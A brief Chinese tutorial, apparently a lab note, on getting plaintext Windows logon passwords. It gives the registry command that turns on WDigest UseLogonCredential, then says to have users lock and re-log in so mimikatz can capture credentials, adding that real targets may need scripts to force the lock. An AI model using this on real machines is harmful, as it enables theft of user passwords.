本文的前提我们要有高权限。否则用不了mimikatz。
目录
第二步:用户锁屏登陆,或者重启登陆。然后mimikatz就可以抓到了
第一步:修改注册表开启UseLogonCredential
这个可以你直接在windows sever命令行里面直接运行
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
第二步:用户锁屏登陆,或者重启登陆。然后mimikatz就可以抓到了
因为是模拟环境我是直接自己收到锁屏然后登陆的。真实环境可能需要用一些脚本帮助锁屏